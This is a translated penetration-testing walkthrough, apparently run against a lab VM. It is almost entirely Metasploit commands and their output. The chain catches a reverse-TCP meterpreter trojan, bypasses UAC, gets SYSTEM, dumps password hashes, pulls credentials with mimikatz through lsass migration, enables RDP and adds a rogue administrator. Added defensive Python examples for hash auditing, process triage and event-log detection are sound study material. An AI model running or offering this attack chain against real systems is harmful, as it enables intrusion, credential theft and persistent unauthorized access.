MSF penetration using a trojan

Penetration with MSF using a trojan

1. Generate the trojan

2. Listen

#!bash/bin:

#Enter msf

msfconsole

#Use the msf handler

msf6 exploit(windows/local/bypassuac) > use exploit/multi/handler 
[*] Using configured payload windows/meterpreter/reverse_tcp

#Set the payload

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp

#Set the attacking machine's IP

msf6 exploit(multi/handler) > set lhost 192.168.44.131
lhost => 192.168.44.131

#Set the attacking machine's port

msf6 exploit(multi/handler) > set lport 4444
lport => 4444

#Listen

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.44.131:4444 
[*] Sending stage (175174 bytes) to 192.168.44.137
[*] Meterpreter session 9 opened (192.168.44.131:4444 -> 192.168.44.137:51323 ) at 2022-05-10 00:12:08 -0400

#Session on the victim machine obtained; put it in the background

meterpreter > background
[*] Backgrounding session 9...

https://blog.csdn.net/lvlheike/article/details/104643578

3. Privilege escalation

#Bypass UAC using bypassuac

msf6 exploit(multi/handler) > use exploit/windows/local/bypassuac
[*] Using configured payload windows/meterpreter/reverse_tcp

#Set the session

msf6 exploit(windows/local/bypassuac) > set session 9
session => 9

#Run the bypass

msf6 exploit(windows/local/bypassuac) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Started reverse TCP handler on 192.168.44.131:4444 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (175174 bytes) to 192.168.44.137
[*] Meterpreter session 10 opened (192.168.44.131:4444 -> 192.168.44.137:52055 ) at 2022-05-10 00:12:59 -0400

#Bypass complete; get the current username

meterpreter > getuid
Server username: root-PC\root

#Escalate privileges

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

#Get the current username

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

#Get the victim machine's password hashes (MD5-encrypted); the first way of obtaining plaintext passwords

meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 7481dac7418852c914b1f37ca9f2b1c6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
root:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
001:1001:aad3b435b51404eeaad3b435b51404ee:3ef260ff1958f87ffd63b7d64705b396:::
003:1002:aad3b435b51404eeaad3b435b51404ee:cf31750ebd133c6882c95af971e62a7c:::

#Export the victim machine's password hashes; the first way of obtaining plaintext passwords

meterpreter > run windows/gather/smart_hashdump

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running module against ROOT-PC
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20220510003633_default_192.168.44.137_windows.hashes_755360.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 7481dac7418852c914b1f37ca9f2b1c6...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hints...
[*]     No users with password hints on this system
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     root:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     001:1001:aad3b435b51404eeaad3b435b51404ee:3ef260ff1958f87ffd63b7d64705b396:::
[+]     003:1002:aad3b435b51404eeaad3b435b51404ee:cf31750ebd133c6882c95af971e62a7c:::
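
Read from the defender's side, the dump above already shows which accounts are badly protected. The following is an added example, not part of the original post: it audits pwdump-format lines for blank passwords, stored LM hashes and shared passwords, using the five account lines printed above as input. The function names are this example's own.

```python
import re
from collections import defaultdict

# Hashes of the empty password. EMPTY_LM is also what dump tools print when no
# LM hash is stored, so only EMPTY_NT proves that an account has no password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# user:rid:lm:nt::: with the optional "[+]" prefix printed by smart_hashdump.
# Field 4 is the NT hash (MD4 over the UTF-16LE password).
PWDUMP = re.compile(
    r"^\s*(?:\[\+\]\s*)?([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::\s*$", re.I)

# The five account lines from the hashdump output on this page.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
root:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
001:1001:aad3b435b51404eeaad3b435b51404ee:3ef260ff1958f87ffd63b7d64705b396:::
003:1002:aad3b435b51404eeaad3b435b51404ee:cf31750ebd133c6882c95af971e62a7c:::
"""


def parse_pwdump(text):
    """Return unique (user, rid, lm, nt) tuples; lines in any other shape are skipped."""
    rows = []
    for line in text.splitlines():
        m = PWDUMP.match(line)
        if not m:
            continue
        row = (m.group(1).strip(), int(m.group(2)),
               m.group(3).lower(), m.group(4).lower())
        if row not in rows:
            rows.append(row)
    return rows


def audit(text):
    """Summarise weak credential storage visible in a pwdump-format listing."""
    rows = parse_pwdump(text)
    by_nt = defaultdict(list)
    for user, _rid, _lm, nt in rows:
        if nt != EMPTY_NT:
            by_nt[nt].append(user)
    return {
        # Accounts whose NT hash is the hash of the empty string.
        "blank_password": [u for u, _, _, nt in rows if nt == EMPTY_NT],
        # Accounts that still carry a real (weak, legacy) LM hash.
        "lm_stored": [u for u, _, lm, _ in rows if lm != EMPTY_LM],
        # Groups of accounts with identical non-empty NT hashes (same password).
        "shared_password": sorted(us for us in by_nt.values() if len(us) > 1),
        # RID 500 is the built-in Administrator.
        "builtin_admin_blank": any(rid == 500 and nt == EMPTY_NT
                                   for _, rid, _, nt in rows),
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE).items():
        print(key, value)
```

The pwdump format does not record whether an account is disabled, so a blank Guest entry has to be checked against the account's status separately.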

#Get account names and plaintext passwords; load the kiwi module

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

[!] Loaded x86 Kiwi on an x64 architecture.

Success.

#kiwi cannot run on x64; a memory (process) migration is required

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials

meterpreter > kiwi_cmd sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; ==mimikatz x86 cannot access x64 process==


meterpreter > ps

Process List
============

 PID   PPID  Name                Arch  Session  User                          Path
 ---   ----  ----                ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System              x64   0
 244   4     smss.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 292   492   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 336   320   csrss.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 388   320   wininit.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 396   380   csrss.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 432   380   winlogon.exe        x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 460   396   conhost.exe         x64   1        root-PC\root                  C:\Windows\System32\conhost.exe
 492   388   services.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 500   388   lsass.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 508   388   lsm.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 604   492   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 680   492   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 764   492   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 804   492   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 856   492   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1000  492   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1104  804   dwm.exe             x64   1        root-PC\root                  C:\Windows\System32\dwm.exe
 1132  1092  explorer.exe        x64   1        root-PC\root                  C:\Windows\explorer.exe
 1172  492   spoolsv.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1192  492   taskhost.exe        x64   1        root-PC\root                  C:\Windows\System32\taskhost.exe
 1280  492   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1428  492   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1456  396   conhost.exe         x64   1        root-PC\root                  C:\Windows\System32\conhost.exe
 1496  1132  vm3dservice.exe     x64   1        root-PC\root                  C:\Windows\System32\vm3dservice.exe
 1504  1132  vmtoolsd.exe        x64   1        root-PC\root                  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1712  1528  jusched.exe         x86   1        root-PC\root                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
 1728  1528  Kernel32.exe        x86   1        root-PC\root                  C:\Windows\SysWOW64\Kernel32.exe
 1820  492   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1844  492   nessus-service.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Tenable\Nessus\nessus-service.exe
 1868  492   VGAuthService.exe   x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 1876  1844  nessusd.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Tenable\Nessus\nessusd.exe
 1912  492   vmtoolsd.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2016  776   PDdXBksB.exe        x86   1        root-PC\root                  C:\Users\root\AppData\Local\Temp\PDdXBksB.exe
 2040  2056  chrome.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
 2056  1132  chrome.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
 2060  2056  chrome.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
 2068  2056  chrome.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
 2128  604   WmiPrvSE.exe        x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 2212  492   dllhost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dllhost.exe
 2360  492   msdtc.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 2572  492   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2576  2056  chrome.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
 2604  492   SearchIndexer.exe   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
 2744  2056  chrome.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
 2848  4300  cmd.exe             x86   1        root-PC\root                  C:\Windows\SysWOW64\cmd.exe
 3120  1132  shell.exe           x86   1        root-PC\root                  C:\Users\root\Desktop\shell.exe
 3136  4328  httpd.exe           x86   1        root-PC\root                  C:\phpStudy\PHPTutorial\Apache\bin\httpd.exe
 3452  396   conhost.exe         x64   1        root-PC\root                  C:\Windows\System32\conhost.exe
 3740  396   conhost.exe         x64   1        root-PC\root                  C:\Windows\System32\conhost.exe
 3804  1132  firefox.exe         x86   1        root-PC\root                  C:\Users\root\Desktop\Firefox 49.0.1 渗透便携版 90SEC beta6\Firefox\firefox\firefox.exe
 4028  2056  chrome.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
 4328  5220  httpd.exe           x86   1        root-PC\root                  C:\phpStudy\PHPTutorial\Apache\bin\httpd.exe
 4436  5736  wemeetapp.exe       x86   1        root-PC\root                  C:\Program Files (x86)\Tencent\WeMeet\wemeetapp.exe
 4688  5220  mysqld.exe          x86   1        root-PC\root                  C:\phpStudy\PHPTutorial\MySQL\bin\mysqld.exe
 4700  5328  java.exe            x64   1        root-PC\root                  C:\Program Files (x86)\java\bin\java.exe
 4756  2684  ggjfmL.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Temp\ggjfmL.exe
 4976  5800  TBSWebRenderer.exe  x86   1        root-PC\root                  C:\Program Files (x86)\Tencent\WeMeet\3.7.9.426\TBSWebRenderer.exe
 5060  5800  TBSWebRenderer.exe  x86   1        root-PC\root                  C:\Program Files (x86)\Tencent\WeMeet\3.7.9.426\TBSWebRenderer.exe
 5220  5180  phpStudy.exe        x86   1        root-PC\root                  C:\phpStudy\phpStudy.exe
 5328  5604  java.exe            x64   1        root-PC\root                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_1081258\java.exe
 5604  4304  cmd.exe             x64   1        root-PC\root                  C:\Windows\System32\cmd.exe
 5736  5668  wemeetapp.exe       x86   1        root-PC\root                  C:\Program Files (x86)\Tencent\WeMeet\wemeetapp.exe
 5800  5736  wemeetapp.exe       x86   1        root-PC\root                  C:\Program Files (x86)\Tencent\WeMeet\wemeetapp.exe
 6084  5800  wemeetapp.exe       x86   1        root-PC\root                  C:\Program Files (x86)\Tencent\WeMeet\wemeetapp.exe
 6092  5800  wemeetapp.exe       x86   1        root-PC\root                  C:\Program Files (x86)\Tencent\WeMeet\wemeetapp.exe

#Memory migration into lsass.exe

meterpreter > migrate 500
[*] Migrating from 4756 to 500...
[*] Migration completed successfully.
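
The process list and the migration message together show what an incident responder would look for: the session was running in PID 4756, which the list shows as ggjfmL.exe under AppData\Local\Temp. The following is an added example, not part of the original post: it triages a process listing in the column layout above with three heuristics chosen for this example (user-writable image paths, executables named after system DLLs, system process names outside System32); the sample rows are copied from the list above and C:\Windows is assumed as the system root.

```python
import re

# PID PPID Name Arch Session User <2+ spaces> Path, as in the listing above.
ROW = re.compile(
    r"^\s*(\d+)\s+(\d+)\s+(\S+)\s+(x86|x64)\s+(\d+)\s+(.+?)\s{2,}(\S.*?)\s*$")

USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\desktop\\", "\\downloads\\")
# Core Windows DLL names; an .exe carrying one of them is masquerading.
SYSTEM_DLLS = {"kernel32", "ntdll", "user32", "advapi32"}
# Process names that should only ever run from System32 (assumed C:\Windows).
SYSTEM32_ONLY = {"lsass.exe", "services.exe", "svchost.exe",
                 "winlogon.exe", "csrss.exe", "smss.exe"}

# Rows copied from the process list on this page (a subset).
SAMPLE = r"""
 PID   PPID  Name                Arch  Session  User                          Path
 ---   ----  ----                ----  -------  ----                          ----
 4     0     System              x64   0
 500   388   lsass.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 1132  1092  explorer.exe        x64   1        root-PC\root                  C:\Windows\explorer.exe
 1728  1528  Kernel32.exe        x86   1        root-PC\root                  C:\Windows\SysWOW64\Kernel32.exe
 2016  776   PDdXBksB.exe        x86   1        root-PC\root                  C:\Users\root\AppData\Local\Temp\PDdXBksB.exe
 2056  1132  chrome.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
 3120  1132  shell.exe           x86   1        root-PC\root                  C:\Users\root\Desktop\shell.exe
 4756  2684  ggjfmL.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Temp\ggjfmL.exe
 5220  5180  phpStudy.exe        x86   1        root-PC\root                  C:\phpStudy\phpStudy.exe
"""


def triage(ps_text):
    """Return (pid, name, reasons) for every row that trips a heuristic."""
    findings = []
    for line in ps_text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # header, separator, or kernel rows without user/path
        pid, name, path = int(m.group(1)), m.group(3).lower(), m.group(7).lower()
        reasons = []
        if any(d in path for d in USER_WRITABLE):
            reasons.append("runs from a user-writable directory")
        if name.endswith(".exe") and name[:-4] in SYSTEM_DLLS:
            reasons.append("executable named after a system DLL")
        if name in SYSTEM32_ONLY and not path.startswith("c:\\windows\\system32\\"):
            reasons.append("system process name outside System32")
        if reasons:
            findings.append((pid, m.group(3), reasons))
    return findings


if __name__ == "__main__":
    for pid, name, reasons in triage(SAMPLE):
        print(pid, name, "; ".join(reasons))
```

A hit is a lead for review, not a verdict: portable tools started from the Desktop trip the same rule as a dropped payload.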

#The second way of obtaining plaintext passwords

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
root      root-PC  aad3b435b51404eeaad3b435b51404ee  31d6cfe0d16ae931b73c59d7e0c089c0  da39a3ee5e6b4b0d3255bfef95601890afd80709

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
ROOT-PC$  WORKGROUP  (null)
root      root-PC    (null)

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
root      root-PC  (null)

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
root      root-PC    (null)
root-pc$  WORKGROUP  (null)

#The third way of obtaining plaintext

meterpreter > kiwi_cmd sekurlsa::logonpasswords

Authentication Id : 0 ; 85913 (00000000:00014f99)
Session           : Interactive from 1
User Name         : root
Domain            : root-PC
Logon Server      : ROOT-PC
Logon Time        : 2022/5/9 17:17:02
SID               : S-1-5-21-2889893998-2302651844-2107436998-1000
        msv :
         [00000003] Primary
         * Username : root
         * Domain   : root-PC
         * LM       : aad3b435b51404eeaad3b435b51404ee
         * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
         * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
        tspkg :
         * Username : root
         * Domain   : root-PC
         * Password : (null)
        wdigest :
         * Username : root
         * Domain   : root-PC
         * Password : (null)
        kerberos :
         * Username : root
         * Domain   : root-PC
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 85874 (00000000:00014f72)
Session           : Interactive from 1
User Name         : root
Domain            : root-PC
Logon Server      : ROOT-PC
Logon Time        : 2022/5/9 17:17:02
SID               : S-1-5-21-2889893998-2302651844-2107436998-1000
        msv :
         [00000003] Primary
         * Username : root
         * Domain   : root-PC
         * LM       : aad3b435b51404eeaad3b435b51404ee
         * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
         * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
        tspkg :
         * Username : root
         * Domain   : root-PC
         * Password : (null)
        wdigest :
         * Username : root
         * Domain   : root-PC
         * Password : (null)
        kerberos :
         * Username : root
         * Domain   : root-PC
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2022/5/9 17:17:02
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : ROOT-PC$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2022/5/9 17:17:02
SID               : S-1-5-20
        msv :
        tspkg :
        wdigest :
         * Username : ROOT-PC$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
         * Username : root-pc$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 46650 (00000000:0000b63a)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2022/5/9 17:17:01
SID               : 
        msv :
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : ROOT-PC$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2022/5/9 17:17:01
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : ROOT-PC$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
         * Username : root-pc$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :
        credman :

4. Remote connection

#Enable remote login

meterpreter > run post/windows/manage/enable_rdp 

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: extapi_adsi_domain_query, extapi_clipboard_get_data, extapi_clipboard_monitor_dump, extapi_clipboard_monitor_pause, extapi_clipboard_monitor_purge, extapi_clipboard_monitor_resume, extapi_clipboard_monitor_start, extapi_clipboard_monitor_stop, extapi_clipboard_set_data, extapi_ntds_parse, extapi_pageant_send_query, extapi_service_control, extapi_service_enum, extapi_service_query, extapi_window_enum, extapi_wmi_query, stdapi_sys_process_set_term_size
[*] Enabling Remote Desktop
[*]     RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]     Terminal Services service is already set to auto
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20220510004616_default_192.168.44.137_host.windows.cle_560551.txt

#Enter the victim machine's shell

meterpreter > shell
Process 1484 created.
Channel 2 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

#Switch the code page; the garbled text is caused by Windows and Linux using different encodings

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

#View the current service status

C:\Windows\system32>net start
net start
These Windows services are started:

   Application Experience
   Application Information
   Background Intelligent Transfer Service
   Base Filtering Engine
   Certificate Propagation
   COM+ Event System
   COM+ System Application
   Computer Browser
   Cryptographic Services
   DCOM Server Process Launcher
   Desktop Window Manager Session Manager
   DHCP Client
   Diagnostic Policy Service
   Diagnostic Service Host
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Function Discovery Resource Publication
   Group Policy Client
   IKE and AuthIP IPsec Keying Modules
   IP Helper
   IPsec Policy Agent
   Multimedia Class Scheduler
   Network Connections
   Network List Service
   Network Location Awareness
   Network Store Interface Service
   Offline Files
   Plug and Play
   Power
   Print Spooler
   Program Compatibility Assistant Service
   Remote Desktop Configuration
   Remote Desktop Services
   Remote Desktop Services UserMode Port Redirector
   Remote Procedure Call (RPC)
   RPC Endpoint Mapper
   Secondary Logon
   Security Accounts Manager
   Security Center
   Server
   Shell Hardware Detection
   SSDP Discovery
   System Event Notification Service
   Task Scheduler
   TCP/IP NetBIOS Helper
   Tenable Nessus
   Themes
   User Profile Service
   VMware Alias Manager and Ticket Service
   VMware Tools
   Windows Audio
   Windows Audio Endpoint Builder
   Windows Defender
   Windows Event Log
   Windows Firewall
   Windows Font Cache Service
   Windows Management Instrumentation
   Windows Search
   Windows Update
   Workstation

The command completed successfully.

#Add the created user to the administrators group so that it can log in remotely

C:\Windows\system32>net localgroup administrators 001 /add           
net localgroup administrators 001 /add
The command completed successfully.

Demonstration

rdesktop 192.168.44.137 -u 001   
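
The two steps of section 4, adding an account to the local Administrators group from a SYSTEM shell and then logging in over RDP with it, can be correlated in the Windows Security log. The following is an added example, not part of the original post: it assumes auditing of security group management and logon is enabled and that events 4732 and 4624 have been normalised into dictionaries with their Windows field names. The events and timestamps are constructed; the SID for account 001 combines the machine SID from the sekurlsa output with RID 1001 from the hashdump.

```python
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"   # built-in local Administrators group
LOCAL_SYSTEM_SID = "S-1-5-18"         # NT AUTHORITY\SYSTEM
REMOTE_INTERACTIVE = 10               # 4624 LogonType used by RDP

MACHINE_SID = "S-1-5-21-2889893998-2302651844-2107436998"

# Constructed sample events (not captured from the host on this page).
SAMPLE_EVENTS = [
    {"EventID": 4624, "TimeCreated": "2022-05-09T17:17:02", "LogonType": 2,
     "TargetUserSid": MACHINE_SID + "-1000", "IpAddress": "-"},
    {"EventID": 4732, "TimeCreated": "2022-05-10T00:50:00",
     "TargetSid": ADMINISTRATORS_SID, "MemberSid": MACHINE_SID + "-1001",
     "SubjectUserSid": LOCAL_SYSTEM_SID},
    {"EventID": 4624, "TimeCreated": "2022-05-10T00:52:00", "LogonType": 10,
     "TargetUserSid": MACHINE_SID + "-1000", "IpAddress": "192.168.44.1"},
    {"EventID": 4624, "TimeCreated": "2022-05-10T00:55:00", "LogonType": 10,
     "TargetUserSid": MACHINE_SID + "-1001", "IpAddress": "192.168.44.131"},
]


def detect(events, window=timedelta(hours=24)):
    """Flag Administrators-group additions made by SYSTEM, and RDP logons by
    an account that was added to Administrators within `window` before."""
    alerts, added_at = [], {}
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4732 and ev.get("TargetSid") == ADMINISTRATORS_SID:
            added_at[ev["MemberSid"]] = ts
            # Group changes are normally made by a named admin, not by SYSTEM.
            if ev.get("SubjectUserSid") == LOCAL_SYSTEM_SID:
                alerts.append(("admin-add-by-system", ev["MemberSid"]))
        elif ev["EventID"] == 4624 and ev.get("LogonType") == REMOTE_INTERACTIVE:
            t0 = added_at.get(ev["TargetUserSid"])
            if t0 is not None and ts - t0 <= window:
                alerts.append(("rdp-logon-after-admin-add",
                               ev["TargetUserSid"], ev["IpAddress"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```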